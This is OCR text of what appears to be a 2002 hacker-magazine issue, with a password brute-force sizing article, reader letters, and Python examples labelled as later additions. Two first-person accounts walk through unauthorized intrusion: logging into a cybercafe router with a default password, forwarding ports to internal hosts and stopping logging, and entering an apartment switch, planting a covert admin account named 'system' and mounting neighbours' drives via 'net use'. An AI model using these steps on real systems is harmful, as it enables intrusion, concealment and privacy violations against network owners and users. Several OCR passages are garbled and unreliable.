process. This is how each sentence appears to be on its own line, even though a text file is a continuous
string of data.

The problem arises when one of the characters is missing. Let's say for some reason the text file does
not contain the carriage return control characters.

What your computer sees:

Joe is COOL.[LF]He likes Cheese Pizza![LF]DMCA Sucks.

What you see:

Joe is COOL.
            He likes Cheese Pizza!
                                  DMCA Sucks.

This is because the computer displays the first part, "Joe is COOL.", hits the linefeed control
character, and spaces the character down one line where it left off. Since there is no carriage return, the
computer does not reset the cursor at the beginning of the line and it just starts printing where it left off, just
one line down.

Now let's say the same text files now have carriage returns, but are missing the linefeeds.

What the computer sees:

Joe is COOL.[CR]He likes Cheese Pizza![CR]DMCA Sucks.

What you see:

DMCA Sucks.eese Pizza!

This is because the computer prints the first part, "Joe is COOL.", then hits the carriage return control
character and sets the cursor back to the J in Joe. Then it continues with the next line, "He likes Cheese
Pizza!," overwriting what was on the screen before. Since there was no linefeed, the computer did not go
to the next line.

The most common place you may experience problems from CR and LF mismatches is during telnet
and terminal sessions. Telnet is not as much of a problem because most servers have adopted the VT100
standard, but using a terminal emulator on a modem has been famous for this kind of trouble. Also CR
and LF play a major role when using a dot-matrix printer. Anyhow, back to the file formatting.

This is why sometimes if you copy a text file from one operating system to another, it doesn't open
right. There are simple ways to fix this, such as opening them in a program that understands the format,
then resaving them. But the fact is that Unix/Linux and Windows/DOS use different text file formats, and
the size of a password file will be larger on a Windows/DOS system than a Unix/Linux system.
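
The three cases above, replayed in code as an added example (not from the original article): `render()` applies the CR and LF rules exactly as described, and `count_endings()` / `to_crlf()` diagnose and repair a file whose line endings are mismatched. The function names are this example's own, and the sample streams are constructed from the article's text.

```python
import re

CR, LF = "\r", "\n"

# Constructed sample streams: the article's three lines with each kind of ending.
CRLF_TEXT = "Joe is COOL.\r\nHe likes Cheese Pizza!\r\nDMCA Sucks."
LF_ONLY = CRLF_TEXT.replace("\r\n", "\n")
CR_ONLY = CRLF_TEXT.replace("\r\n", "\r")


def render(stream):
    """Replay a character stream on a blank screen and return the visible rows.

    CR: cursor goes to column 0 of the current row.
    LF: cursor goes down one row, column unchanged.
    Anything else is written at the cursor and overwrites what was there.
    """
    rows = [[]]
    row = col = 0
    for ch in stream:
        if ch == CR:
            col = 0
        elif ch == LF:
            row += 1
            if row == len(rows):
                rows.append([])
        else:
            line = rows[row]
            line.extend(" " * (col - len(line)))  # pad if the cursor is past the end
            if col < len(line):
                line[col] = ch                    # overwrite what is already there
            else:
                line.append(ch)
            col += 1
    return ["".join(r) for r in rows]


def count_endings(text):
    """Count CR+LF pairs, CRs with no LF after them, and LFs with no CR before them."""
    pairs = text.count(CR + LF)
    return {
        "CRLF": pairs,
        "bare_CR": text.count(CR) - pairs,
        "bare_LF": text.count(LF) - pairs,
    }


def to_crlf(text):
    """Rewrite every line ending (CR+LF, bare CR or bare LF) as CR+LF."""
    return re.sub(r"\r\n|\r|\n", CR + LF, text)


if __name__ == "__main__":
    for name, stream in (("CR+LF", CRLF_TEXT), ("LF only", LF_ONLY), ("CR only", CR_ONLY)):
        print(name, count_endings(stream))
        for visible in render(stream):
            print("   |" + visible)
```

The CR-only case is also why untrusted text is normally stripped of bare carriage returns before it is echoed to a terminal or log viewer: later characters silently overwrite earlier ones.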

Windows/DOS requires a text file to have both the linefeed and carriage return codes, while
Unix/Linux requires only the carriage return (under most configurations).

So, let's get to the math. As discussed earlier, a password can contain any of the characters except the
NULL (code 0) and the carriage return (code 13). So the question is, how big would a text file be that
contains every possible Unix/Linux password?
Let's figure it out.
For all practical purposes, we are going to assume the password can be made of any ASCII character
except 0 and 13, and that it can be between zero and eight characters long.
So, of the 256 possible characters, we are going to be using 254 of them. Let's make a chart of the
possibilities.
We know that there's only one zero-character password, a blank one.
Now, for each of the remaining combinations, we are going to use the formula 254 ^ (number of
characters). This will give the possible combinations of 254 characters for any given length of password.

Number of 0 character passwords: 1
Number of 1 character passwords: 254
Number of 2 character passwords: 64,516
Number of 3 character passwords: 16,387,064
Number of 4 character passwords: 4,162,314,256
Number of 5 character passwords: 1,057,227,821,024
Number of 6 character passwords: 268,535,866,540,096
Number of 7 character passwords: 68,208,110,101,184,384
Number of 8 character passwords: 17,324,859,965,700,833,536
TOTAL: 17,393,337,673,075,145,131
Whew! That's a lotta passwords! But how much hard disk space will a plain-text list of them all take 
up? 


Well, let’s do more math! 

Let's assume the password list will be stored on a Windows/DOS system. This means that every
entry will require a carriage return and linefeed byte to maintain the text file format. So, here's the formula.

Size = [Number of X digit passwords * (X + 2)]

Breakdown: The space needed on the hard drive to store this set of passwords (in bytes) is equal to the
number of password combinations in the set, times the length of each password plus 2 (carriage return
and linefeed).

Example: There are 254 one-character combinations. So that's 254 passwords times a length of three.
Each password is three characters long because of the one-character size, plus the carriage return and
linefeed.

Okay, let's form another table.


X: Number of X digit passwords * (Digits + 2) = Size in Bytes
0: 1 * (0 + 2) = 2
1: 254 * (1 + 2) = 762
2: 64,516 * (2 + 2) = 258,064
3: 16,387,064 * (3 + 2) = 81,935,320
4: 4,162,314,256 * (4 + 2) = 24,973,885,536
5: 1,057,227,821,024 * (5 + 2) = 7,400,594,747,168
6: 268,535,866,540,096 * (6 + 2) = 2,148,286,932,320,768
7: 68,208,110,101,184,384 * (7 + 2) = 613,872,990,910,659,456
8: 17,324,859,965,700,833,536 * (8 + 2) = 173,248,599,657,008,335,360
----------------------------------------------------------------------
TOTAL: 173,864,628,360,502,142,436
So, how big would a Windows/DOS text file that contained every possible Unix/Linux password be?
Looks like 173,864,628,360,502,142,436 bytes.
That's 169,789,676.2 Terabytes.
Well, this is every possible password ever, but remember I said that 99.9 percent of all passwords only
used characters between ASCII codes 32-126? Let's figure this whole thing out again using this set
instead of the whole shebang.

Number of 0 character passwords: 1
Number of 1 character passwords: 95
Number of 2 character passwords: 9,025
Number of 3 character passwords: 857,375
Number of 4 character passwords: 81,450,625
Number of 5 character passwords: 7,737,809,375
Number of 6 character passwords: 735,091,890,625
Number of 7 character passwords: 69,833,729,609,375
Number of 8 character passwords: 6,634,204,312,890,625


X: Number of X digit passwords * (Digits + 2) = Size in Bytes
0: 1 * (0 + 2) = 2
1: 95 * (1 + 2) = 285
2: 9,025 * (2 + 2) = 36,100
3: 857,375 * (3 + 2) = 4,286,875
4: 81,450,625 * (4 + 2) = 488,703,750
5: 7,737,809,375 * (5 + 2) = 54,164,665,625
6: 735,091,890,625 * (6 + 2) = 5,880,735,125,000
7: 69,833,729,609,375 * (7 + 2) = 628,503,566,484,375
8: 6,634,204,312,890,625 * (8 + 2) = 66,342,043,128,906,250
----------------------------------------------------------------------
TOTAL: 66,976,482,088,208,262


So, a plain-text Windows/DOS format text file containing every possible Unix/Linux password for
ASCII characters 32-126 would be:

66,976,482,088,208,262 bytes which is 65,406.7 Terabytes.


Quite a large file. 


Perhaps now you can understand why I am forced to laugh when I see a program on a web page or
BBS that claims to be able to generate a complete password list using the entire ASCII alphabet. Sure, the
program probably could do it, if it had two million terabytes to work with. And, oh, it would probably take
a few decades too.


My point being, brute force is a real time-consuming game. It takes raw power that most of us just 
don't have available. If you need to brute force, then you'll need to get a program that generates the pass- 
word list as it goes, therefore making the requirement for free hard drive space a little less. 
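
The arithmetic behind both tables, as an added Python example (not the author's code): `rows()` reproduces the per-length counts and CR+LF list sizes for the 254- and 95-character sets, and `measured_size()` streams a lazily generated list over a small constructed alphabet to confirm the Size formula without storing anything. The function names, the three-letter check alphabet and the one-million-per-second rate are assumptions of this example.

```python
from itertools import product


def rows(alphabet_size, max_len, terminator_len=2):
    """One (X, count, size_in_bytes) tuple per password length X = 0..max_len.

    count = alphabet_size ** X and size = count * (X + terminator_len), where
    terminator_len is 2 for the CR + LF pair the article assumes per entry.
    """
    table = []
    for x in range(max_len + 1):
        count = alphabet_size ** x
        table.append((x, count, count * (x + terminator_len)))
    return table


def total_passwords(alphabet_size, max_len):
    """Sum of the count column: every password of length 0..max_len."""
    return sum(count for _, count, _ in rows(alphabet_size, max_len))


def list_size_bytes(alphabet_size, max_len, terminator_len=2):
    """Sum of the size column: bytes needed for the complete plain-text list."""
    return sum(size for _, _, size in rows(alphabet_size, max_len, terminator_len))


def enumerate_strings(alphabet, max_len):
    """Yield every string of length 0..max_len one at a time; nothing is stored."""
    for x in range(max_len + 1):
        for combo in product(alphabet, repeat=x):
            yield "".join(combo)


def measured_size(alphabet, max_len, terminator=b"\r\n"):
    """Bytes a written-out list would need, counted while streaming the generator."""
    return sum(len(s) + len(terminator) for s in enumerate_strings(alphabet, max_len))


def years_to_enumerate(alphabet_size, max_len, per_second):
    """Time to walk the whole space at an assumed, constant rate."""
    seconds = total_passwords(alphabet_size, max_len) / per_second
    return seconds / (365 * 24 * 3600)


if __name__ == "__main__":
    for size in (254, 95):
        print(f"--- {size} usable characters, lengths 0-8 ---")
        for x, count, nbytes in rows(size, 8):
            print(f"{x}: {count:,} * ({x} + 2) = {nbytes:,}")
        print(f"passwords: {total_passwords(size, 8):,}")
        print(f"list size: {list_size_bytes(size, 8):,} bytes")
    # Constructed check: a 3-letter alphabet is small enough to enumerate in full.
    print("formula:", list_size_bytes(3, 4), "measured:", measured_size("abc", 4))
    # Assumed rate of one million candidates per second.
    print(f"95 chars, 0-8 long: {years_to_enumerate(95, 8, 1_000_000):,.0f} years")
```

The same functions size the search space of any proposed password policy: change the alphabet size or maximum length and compare the totals.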

While most of you probably knew that a complete password list would be quite a large file, even I was
guilty of thinking a 40-gig hard drive would handle the job. By writing this article I hope to have opened
a few people's eyes and save you the wasted time of trying to accomplish something that is, at best, a bad
idea.

In conclusion, I have a question. What do you and all the computers you come in contact with all have
in common? They both are capable of doing whatever the hell you want. Peace Out.


Greetz: sybah, teknig, radiate, MrT, myke @ LM 
[Special Thanks to Windows Calculator]


Tran 


by g00gleminer 
g00gleminer@fiberia.com

I was sitting in a cybercafe recently, daydreaming
how nice it would be to remotely access these
shiny Linux boxen in front of me to hop around the
net anonymously. I gave it a shot. No shell access -
someone clueful set up these hosts. I tried to shoulder
surf the password out of the bored (but helpful)
cafe worker. My eyes were too slow. D'oh! I tried
to browse / via the browser - no luck. The front
door was impervious. But I asked myself if someone
had set up the "back door" with the same attention
to detail. I surfed to
whatismyipaddress.com and got the IP address. I
made a note of it on my PDA. Back in the lab, I
poked around. The IP addy turned out to be a DSL
router doing network address translation (NAT) for
the cafe's machines. This is a pretty common
setup, since it's cheap and secure - if it's set up
correctly. Emphasis on the last part of the sentence.

g00gle@perciplex:g00gle [205] telnet 63.228.XXX.XXX
Trying 63.228.XXX.XXX...
Connected to 63.228.XXX.XXX.
Escape character is '^]'.

Flowpoint/2200 SDSL [ATM] Router fp2200-32 v3.5.1 Ready
Login:

Lessee, could that be on a default password
list? I surfed to www.phenoelit.de/dpl/dpl.html
(this site is threatened by the DMCA, incidentally)
and saw the default immediately: admin (sad, but
true).

Login: AAEE 

Logged in successfully! 

Now what? I had to figure out a way to do
some port redirection so that the Flowpoint would
forward specific service traffic to the same port on
internal, NAT'ed hosts. After some Google (ab)usage,
I did:

# dhcp list

and saw the IP pool of reserved, non-routeable 
addresses handed out to the cafe clients upon issu- 
ing a DHCP request. I chose one of the IPs and is- 
sued the command which would do the port 
forwarding from the Flowpoint to this particular 
internal IP address and port. I chose ftp since it
comes enabled on many linux distros. 

# rem addServer 192.168.254.19 tcp ftp wan 
# exit 

Now I tried to connect to the masqueraded
host:

g00gle@perciplex:g00gle [206] ftp 63.228.XXX.XXX
Connected to some.cybercafe.host
220 some.cybercafe.host FTP server ready.
Name (some.cybercafe.host:g00gle):

Woohoo! It worked. From here, I could do any 
number of things which I will leave to your imagi- 
nation. Note that in getting to this point, I did not 
change the Flowpoint admin password, muck with 
DHCP leases, or generally cause unwarranted 
chaos. I also took the time to restore the service to 
its previous unforwarded state when I was fin- 
ished: 

# rem delServer 192.168.254.19 tcp ftp wan

If you try this for yourself, remember not to 
choose telnet as the forwarded service, or you will 
lose communication with the router on subsequent 
connects. It would also be wise to temporarily turn
logging off prior to exploration of the Flowpoint 
OS: 

# system log stop 

Although this example worked for a cybercafe 
setting, you will encounter similar setups else- 
where since many people 1) trust NAT blindly and 
2) are too lazy to change default passwords. It 
should be easy to do this for Cisco DSL routers as 
well. 





by Chris Byrnes 
JEAH Communications, LLC 
http://www.JEAH.net

A few years back, the government split up the 
monopoly Network Solutions held on the registra- 
tion market. Now, at that time, they still allowed 
Network Solutions to control the global registry 
(the thing that all competing registrars report back 
to so all the data is kept in sync). As you may 
know, Network Solutions is now owned by 
VeriSign.

Our good friends at VeriSign not only operate 
two registrars (registrars.com, and Network Solutions),
but also this central registry called
"VeriSign Global Registry." Lots of domains have
been expiring in the last few months as people forget
to pay their bills, dot com companies flop, etc.
When these domains expire, they are supposed to 
be deleted within a maximum timeframe of 30 to 
45 days. Otherwise the registrar must pay an addi- 
tional registry fee to keep the domain active. (No 
registrar will do this if they don’t get paid by the 
client, of course). This is all according to the 
global registry policy.

Let's do a WHOIS lookup on a domain I know
is expired, because I've been trying to register it:
skullbocks.com. skullbocks.com, of course, was
the domain name used in the popular movie "AntiTrust."
This domain is registered at Network Solutions
and it says "Record expires on
05-May-2001." So I contacted VeriSign and asked
why the domain hasn't been deleted yet. No response.

I spoke with an official at a competing registrar
who told me, "VeriSign essentially is allowed to
break its own rules. It just says that it pays itself
the additional registry fee to keep the domain
alive. In all honesty, VeriSign could continue to
hold onto as many expired domains for however
long it wanted, and never be breaking the registry
rules."

ICANN, the non-profit corporation that was 
formed to assume responsibility for the IP address 
space allocation, protocol parameter assignment, 
domain name system management, and root server 
system management functions, has yet to adopt a 
policy that supersedes the policies put in place by 
VeriSign in this matter. 


by Javier O.
javib3@yahoo.com

I am writing this article because many admins do
not seem to grasp the importance of security, especially
"inside" security. Last summer I moved into
some new apartments here in beautiful west LA.
About a month later we decided to hook up our place
with DSL, so we placed a call and scheduled an
appointment. Weeks later we had DSL. As soon as the
techs were done with the installation, I busted out my
Linksys switch and a couple more hubs and hooked
my whole place up. First thing I did was an IFCONFIG
to get my IP info. I noticed that we were on a
DHCP based service and that we were not the only
ones on the same network segment. I decided to secure
both of my roommates' Windows boxes, unsharing
the drives, setting passwords and permissions for
files and printers. When all that was done I checked
my Linux box. I was curious to see what else was in
our same segment, so I busted out the trusty NMAP
(www.nmap.org) scanner and did a: #>nmap -O
192.168.0/24 > results. That way it would scan the
whole network based on a class C address and the
results from the scan could be saved to the file "results".
As expected, 192.168.1.1 and 192.168.1.2 were
interesting. The first one belonged to a Cisco router and
the second address belonged to a 3com switch. So I
did a quick telnet to the switch and didn't get a
prompt. So I hit the ENTER key twice and bam! I got
a Login prompt. 3com switches by default have no
password set. According to the manual, you are supposed
to set one upon installation... tsk, tsk. So I typed
in "Admin" with no password and I got the following:


Login: admin
Password:

Menu options: --------3Com SuperStack II Switch 1100--------
ethernet - Administer Ethernet ports
ip - Administer IP
logout - Logout of the Command Line Interface
snmp - Administer SNMP
system - Administer system-level functions

Type * for help.
Switch 1100 (/)--------------------

Select menu option:


I went to the Ethernet menu and checked the
statuses on all the ports. Of course they were all set to
half duplex. So I quickly ran IPCONFIG again on my
computer and got my MAC address. That way I
could check the tables on the switch and find out
what port I was assigned to. I found my MAC address
matched with the MAC address in port 18. My
roommates' MACs also matched port 18. So I went
back to the switch and decided to change our port to
full duplex. I logged in and typed:


>ethernet <enter> 
>portMode <enter>


Next it asked "what port?" So I typed 18 and then it
asked to enter a value.

Select Ethernet port (1-26): 18
Enter new value (10half,10full) [10full]:


I entered "10full" and was sent back to the main
menu. I doublechecked my work and port 18 was at
"10 full". Cool! Next I would create an account for
myself, just in case an act of faith occurs and the admin
decides to check his network and devices. Trying
to make the account not seem suspicious, I named it
"system" and gave full access to it. Before any
changes take place you have to reset the switch, which
can be done remotely. Now by doing some bandwidth
tests, I see some improvement on our connections. It
is not a huge difference since all I did was double the
throughput of the port (full duplex doubles the
throughput of a link), so the bandwidth and other network
traffic was still the same. But at least it helps.
Now the other IP address (192.168.1.1): I was able to
telnet to the Cisco router and get low level access.
Nothing really useful but by running the command:
">show version" I can see that it is a Cisco 2600. The
only way to get root that I know of requires physical
access to the router. Hmm... I guess I can look around
my building next time I take out the trash. There are a
lot of other security issues with this setup, like the
ever famous "file and printer sharing" by Microsoft.
All I had to do was open up "My Network Places" and
choose a workgroup (about five exist on my segment),
then just see what hosts offered what services. It was
really kinda easy to do a "net use x: \\ipaddress\c$" on
my computer and mount some person's drive since
Windows by default shares \c$ and \IPC$. But I was
more interested in the switch and router than snooping
around other people's drives.

As admins and enthusiasts, always secure your 
shit from both sides and never trust the users. 

Shout outs to: Happydren, Alezzz, Escorpion, lit- 
figsunshynge, my Family and to all my other pitas! 
I wrote my own letter:

"Back when I was in high school, I read magazines
about computers and software. Then I started building
my own computers from parts salvaged from friends'
old computers plus whatever I had to buy to put everything
together.

"I would also sometimes "borrow" software which
I could not afford to purchase. While this was illegal, it
is a badly kept secret that this can sometimes greatly
help vendors of the most expensive software to have it
widely available to people interested in learning the
software. They then go to work for companies which
buy hundreds or thousands of copies. In fact, some of
the most expensive creative software is now being
given away free to non-business users for exactly this
reason.

"If I hadn't gotten that experience I wouldn't have 
the great job and career I have today. I am now well 
paid and therefore have quite a bit of disposable in- 
come which I use for software, new technology, and 
entertainment. 

"On the entertainment side, there have been dozens 
of reports showing that Napster actually increased album
sales. DVD, which most major studios initially
tried to destroy in favor of a horrendous pay-per-watch 
format, has been the best thing to happen to that indus- 
try since the VHS machine (which you may recall they 
also fought). 

"Regardless of what is good for Corporate Amer- 
ica, for once please concentrate on what is good for the 
citizenry. There are laws on the books right now which 
clearly establish the right of a customer to make a copy 
of an item they've purchased for use in another format 
(ex. for transfer to a more portable system) or as a 
safeguard against damage to the original. These rights 
are being violated by members of the MPAA and espe- 
cially RIAA every single day, yet nothing is done. 

"I ask that you not only prevent the likes of the 
SSSCA, but that you look into the continued routine 
violations of customers’ fair-use and other rights, un- 
fair business practices, and price fixing by the compa- 
nies evens SSSCA." 


ii If aA pébple to 
sending letters. in th | d 
even making plore to talk wa 
cials, it would definitely make a nor Since this 
letter was sent, the SSSCA has been renamed the CBDTPA
(Consumer Broadband and Digital Television
Promotion Act). Keep updated and spread the word -
it really ouronly Hane 4 id a 
N y ie 
Corporate Corruption


Dear 2600: 

I received a rather interesting mailing today from
MCI. The letter, which is attached to a couple of plastic
cards, advertises a new service allowing MCI subscribers
to dial home using a toll-free number
(1-800-484-6236) and a four-digit code. Each call
costs 35 cents an «plus a 26 cent access charge if
the number is dialed from a payphone. Interestingly,
the card is "already activated" and no password is
needed - just the four digit code on the card. Now, I got
curious about this and dialed the number. When
prompted for a code, I entered something random and
the call began to ring through. Uh oh! This means anyone
can dial into this system and hit random stuff,
incurring charges on unknowing MCI customers' bills.
According to MCI, "Your [calling cards] are ready to
use right away. There's no need to sign up for anything
and no extra fee to pay [which, by the way, is not quite
true]." I don't see much potential for abuse here, unless
you drop the card and some random individual decides
to call you up repeatedly out of maliciousness -
or, as in the previous example, if some asshole just decides
to go wacko dialing numbers. Neither of these
things are likely to happen, I suppose, but I would be
willing to bet that every number 0001-9999 rings
through to a different individual's phone line. Misdials
are bound to happen, and one person's mistakes are
conveniently charged directly to another's bill. Not to
mention that the service is a ripoff - the only possible
use I can think of for it is if you are at a payphone with
no change and no access to a cashier or an ATM. Using
a conventional phone card would be more economical
in almost all cases. MCI is essentially charging you extra
to dial your own phone number by way of an insecure,
flawed proxy system that is unnecessary about 99
percent of the time. The ad sheet should have read,
"Make long distance prank phone calls - and charge
them to someone else!" I'd go for that (sarcasm).
~toaste66
To put this kind of a "feature" on someone's phone 
line without their permission is, at best, extraordinar- 
ily sleazy on MCI’s part. 


Dear 2600: 

In your response to DarkBlayd (18:4), you state 
that you don't see how it's possible for Radio Shack to 
lose money if someone elects not to activate a piece of 
hardware that they've bought (such as DirecTV). One 
word: kickbacks. I worked for the Canadian arm way 
back when cell phones first came out. Radio Shack, as 
well as the competitors, sold cell phones at or below 
cost. We got a percentage of the money the airtime 
package cost (usually around $300). I was directed to
no a phone un customer activated it in the 
One ¢ [my Mame ker "forgot" 


vidicón 

If it's clearly understood that an item is only for
sale if it's activated, that's one thing. It's quite another

if it's simply sal inte ie a certain price and then all 

sana info is. ar reps als sale as 
for getting it at dl | prem F 
















I am writing this letter in order to inform you so
you can inform the public. Recently all
Comcast @home (around 500,000) users were transitioned
to comcast.net. Without warning Comcast cut
the service levels @home users were getting in half.
They have also created connectivity issues with the
poorly executed network and their privacy invading
proxies that aren't even able to be user-disabled. After
all this the price is still rising. I pay the same amount
for less than half the service. Comcast doesn't even
have a news server set up. Also, the upload cap they
have set in place has made it difficult to even download
simple files. I've gone on below to list why this
proxy setup is so bad.

1) Access to IP restricted resources is disrupted. In
order to facilitate access to HTTP IP restricted resources,
I must allow the Comcast proxy server to access
these resources. If I allow the Comcast proxy
server to access these resources, I inadvertently allow
any other users of the proxy server access as well.

2) There is no check and balance on Comcast/ATT
in how they implement the Inktomi Traffic Edge software
or what they do with the information they gather,
or even what information they do gather.

3) Customers were not notified of the change in
service.

4) The Comcast call center was ignorant and unaware
of the change in service.

5) Software which would defeat the intended purpose
of the proxy server (Virtual Private Networks) is
forbidden to be run or implemented by residential
Comcast customers per the Comcast Acceptable Use
Policy and Subscriber Policy.

6) The Traffic Edge software has the ability to exclude
IP addresses from participating in the proxy. I
should be given the opportunity to opt out of this "service"
(I should have been told I was opted in to something
in the first place).

On top of all this you have no other choice if you
want cable Internet access. If Comcast is in your area,
they are your provider. Not to mention that Comcast,
the number three biggest cable provider in the nation,
bought AT&T Broadband, the number one biggest
provider. Comcast has bought out almost all the little
providers over the years. Now you have Comcast from
Philadelphia to Miami. There is no competition. It's
easy to tell Comcast has no desire to make things better.
The only desire they have is to drive up prices by
giving less and less service and charging more and
more.


Robert Williams 
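
Point 1 of the letter above, modeled as an added example (not code from the letter, Comcast, or Inktomi): once a forced proxy sits in the path, an address-based access list can only admit the proxy as a whole, while a per-user credential still tells subscribers apart. The addresses, the demo key, and all function names are constructed for illustration.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Constructed values: RFC 5737 documentation addresses and a demo key.
SUBSCRIBER_A = "198.51.100.10"   # customer the resource owner wants to admit
SUBSCRIBER_B = "198.51.100.77"   # unrelated customer of the same ISP
SHARED_PROXY = "203.0.113.5"     # hypothetical forced HTTP proxy
SECRET = b"constructed-demo-key"


@dataclass
class Request:
    peer_ip: str       # source address the origin server sees
    token: str = ""    # optional per-user credential carried in the request


def direct(client_ip, token=""):
    """Request that reaches the origin straight from the subscriber."""
    return Request(peer_ip=client_ip, token=token)


def via_proxy(client_ip, token=""):
    """The proxy opens its own connection to the origin, so client_ip is lost."""
    return Request(peer_ip=SHARED_PROXY, token=token)


def ip_acl(req, allowed_ips):
    """Address-only restriction, as used for 'IP restricted resources'."""
    return req.peer_ip in allowed_ips


def issue_token(user):
    """Issue a keyed credential bound to one user name."""
    mac = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    return user + ":" + mac


def token_acl(req, allowed_users):
    """Admit on a valid per-user credential, whatever address it arrives from."""
    user, _, mac = req.token.partition(":")
    expected = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    return user in allowed_users and hmac.compare_digest(mac.encode(), expected.encode())


def demo():
    acl = {SUBSCRIBER_A}                 # list written before the proxy existed
    widened = acl | {SHARED_PROXY}       # the only address-based way to re-admit A
    users = {"subscriber-a"}
    return {
        "direct_a": ip_acl(direct(SUBSCRIBER_A), acl),
        "direct_b": ip_acl(direct(SUBSCRIBER_B), acl),
        "proxied_a_old_list": ip_acl(via_proxy(SUBSCRIBER_A), acl),
        "proxied_a_widened": ip_acl(via_proxy(SUBSCRIBER_A), widened),
        "proxied_b_widened": ip_acl(via_proxy(SUBSCRIBER_B), widened),
        "token_a": token_acl(via_proxy(SUBSCRIBER_A, issue_token("subscriber-a")), users),
        "token_b": token_acl(via_proxy(SUBSCRIBER_B, issue_token("subscriber-b")), users),
        "token_forged": token_acl(via_proxy(SUBSCRIBER_B, "subscriber-a:" + "0" * 64), users),
    }


if __name__ == "__main__":
    for name, admitted in demo().items():
        print(f"{name:20s} admitted={admitted}")
```
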


Dear 2600: 

During the Grammys a representative of a record 
company spewed for about five minutes on how the 
"music food chain" is in danger by people who down- 
load and pirate music. Throughout the entire spiel he 
was making false accusations, saying that every kid is 
downloading music on the computer behind their par- 
ents' backs, able to download 6,000 songs in three 
days. Come on! I live off a shit 56k connection. There 
is no way I could even start on that number! He was all 
concerned about how the artists will not receive their 
money when they make about $2 off every CD while 
the rest is sent to record companies. It seems he is 
more worried over his money than the "music food 
chain." Give me a break! 

eOd3wrick3r 

It would be interesting to ask this guy if he actually 
thought someone would buy that amount of music in a 
record store. If that figure is anywhere close to true 
(and we don't believe it for a nanosecond), they should 
be happy that people are taking an interest in their 
product and busy thinking up ways to exploit that in- 
terest. In reality, the musicians are being horribly de- 
ceived and taken advantage of by their own record 
companies. A recent "settlement" with online music 
distributors resulted in money going to the record 
companies - and nothing to the artists. We weren't a bit 
surprised but a lot of musicians were. 


Dear 2600: 

It appears Disney is starting young with its brain- 
washing (not that I'm surprised). My girlfriend was 
flicking through the channels tonight and started to 
watch this cartoon on the Disney Channel called "The 
Proud Family." It featured this young kid in a black 
trenchcoat (a Matrix spoof) enticing his young girl- 
friend to download free music from his website. She 
complied and then turned into this crazy music-down- 
loading freak. This eventually led to her arrest and be- 
ing banned from the use of her father’s computer. 
Later she was again enticed by her misguided black 
trenchcoat-wearing friend (who is obviously Disney's 
demented impersonation of a hacker) to download mu- 
sic again. This time, instead of her arrest, she finds at a 
local CD store that all of the CD’s are gone, leaving 
the store owner broke. Her music downloading is to 
blame (of course). Not only is he out of business, but 
various people are out of jobs who have nothing to do 
with the music industry. At the end of the show she 
tells this oh so evil hacker kid that downloading music 
is stealing and to go away. Of course the show ends 
with her getting a great big hug from her mom telling 
her she did the right thing. 

nomotion 

Should anyone be surprised at this kind of propa- 
ganda when such corporations practically own the 
airwaves in this country? And the only reason we even 
say "practically" is because, at least on paper, the air- 
waves still belong to the people and can be taken back 
if the current holders are deemed unworthy. This ap- 
plies to cable outlets as well. 


Dear 2600: 
I was reading through an article today and the 
headline read "Moviegoing Set Record in 2001." Ap- 
parently the movie industry had the highest grossing 
year in 2001 since 1959. Now this strikes me as odd 
because there have been so many news articles about 
how the MPAA is losing billions of dollars each year 
to movie piracy. I went looking for one of these arti- 
cles, and found in one a quote I thought was interest- 
ing: "Claiming that the movie industry is losing $3 
billion annually through theft of its product in one 
form or another, [Jack] Valenti said that what was now 
happening could 'disfigure and shred the future of 
American films' because of the ease with which films 
can now be copied and transported on the Net." 
Dash Interrupt 
We're becoming increasingly convinced that 
there's a parallel universe MPAA that's adversely af- 
fected by these things. There's really no other explana- 
tion as to how they can make such diametrically 
opposed statements and sb Mera both to be true. 
Other than perhaps someone Delia 
honest, that is. Yeah, we'll go 
verse theory. Pa 












Dear 2600: 

Yesterday my Business Tech class had a rather 
lengthy debate on the issue of open source. We also 
discussed the controversial "sharing" of files through 
services like Napster, Kazaa, and Morpheus. I've al- 
ways liked getting stuff for free through those services, 
but I've always sort of been on the fence on that topic. 
Until yesterday. We were right in the middle of this big 
discussion and I was being uncharacteristically quiet. 
Then something deep inside of me woke up. I realized 
something. People say that these services are killing 
the recording industry. I say let them kill it. Destroy 
the establishment. Kill all the record companies and 
movie studios. You can't kill art so it will go on with- 
out them. Only instead of having poppy little pieces of 
shit like Britney Spears and Warner Brothers, you'll 
have an underground coalition of artists, producing 
their work in their basements and sharing it with the 
world for little or no money via the Internet. They'll 
have day jobs and still continue to produce their art be- 
cause they truly believe in and love it. Forget about 
money, lose your self image. Indulge your passions, 
embrace your art. Free your mind, and take down the 
een 

Dear 2600: 

Your contributor "angelazaharia" is most griev- 
ously mistaken in the article "Behind the Scenes on a 
Web Page" (18:4) when asserting that Akamai pro- 
vides its image delivery services "free of charge." I can 
assure you that they do not. At least not intentionally. 

Akamai is a "content delivery network." They op- 
erate an "edge network" of object cache servers, plac- 
ing them in hundreds of NOCs around the world 
(though mostly in North America). The long URLs at- 
tached to "akamaized" images, PDFs, streaming media 
files, and other web page components are actually spe- 
cially assembled URLs that include a cache rule, a 
timestamp and/or fingerprint of the content cached, 
and a serial number that identifies Akamai's customer 
(the web site that owns the component - Wired/Terra 
Lycos in the case of the article’s web page). Akamai 
caches copies of the "heavy" items on a web page on a 
network of servers, and then uses its own proprietary 
algorithms to identify which of the edge servers is 
closest (in a network sense) to the end user, and then 
delivers the content from that server. 

This is meant to improve the response time for 
building a complicated web page by limiting the num- 
ber of network hops that heavy content needs to tra- 
verse to reach the end user. It is also supposed to lower 
the amount of server hardware that a media company 
like Terra Lycos has to invest in themselves by limiting 
the number of requests that come to the site’s origin 
servers. The media company pays dearly for this ser- 
vice - in my experience up to four times the cost of 
bandwidth available from the typical bandwidth 
provider at a colocation center. Whether the supposed 








format of an "ARL" (Akamai Resource Locator) can 
piggyback their own content on a paying Akamai cus- 
tomer’s account. Like I said, they don't intentionally 
give their bandwidth away for free. 


The author implies that Akamai makes its money 
by some form of underhanded distribution of end-user 
data. That has not been my experience. They have no 
problem selling the data back to the web site owner, 
but they do not cross-sell this information between 
firms, as that would be a quick way to get themselves 
sued out of existence, not by the end-users, but by the 
media companies themselves. 

And the author's supposed shock at lycos.com 
cookies and URLs sprinkled about a wired.com page 
should be no surprise at all. Wired News is simply a 
brand owned by Terra Lycos. Of course they are going 
to track your activity on their entire family of sites. To 
those folks, you're not browsing separate sites. You 
are merely browsing different "properties" owned by 
Terra Lycos. It is a rare media company that operates a 
diversity of sites and does not do this kind of thing. Of 
far, far more concern is third-party traffic watchers like 
DoubleClick. 

MSM 

